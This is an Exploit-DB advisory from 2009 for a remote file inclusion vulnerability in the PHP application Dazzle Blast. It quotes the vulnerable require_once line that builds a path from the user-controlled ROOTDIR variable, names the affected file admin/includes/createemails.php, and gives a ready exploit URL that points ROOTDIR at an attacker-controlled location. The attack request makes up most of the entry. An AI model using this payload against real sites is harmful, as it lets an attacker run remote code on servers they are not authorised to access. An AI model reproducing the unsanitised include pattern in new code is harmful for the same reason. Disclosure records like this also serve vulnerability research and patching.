Dazzle Blast Remote File Inclusion

2009-10-12T00:00:00
ID EDB-ID:10046
Type exploitdb
Reporter NoGe
Modified 2009-10-12T00:00:00

Description

Dazzle Blast Remote File Inclusion. Webapps exploit for php platform

                                        
                                            [o] Dazzle Blast Remote File Inclusion Vulnerability
Software : Dazzle Blast
Download : http://www.dazzleblast.com/dazzleblast.zip
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com
Blog     : http://evilc0de.blogspot.com/
Home     : http://antisecurity.org/

[o] Vulnerable file
require_once($ROOTDIR.'admin/functions/general.php');

admin/includes/createemails.php


[o] Exploit
http://localhost/[path]/admin/includes/createemails.php?ROOTDIR=[evilc0de]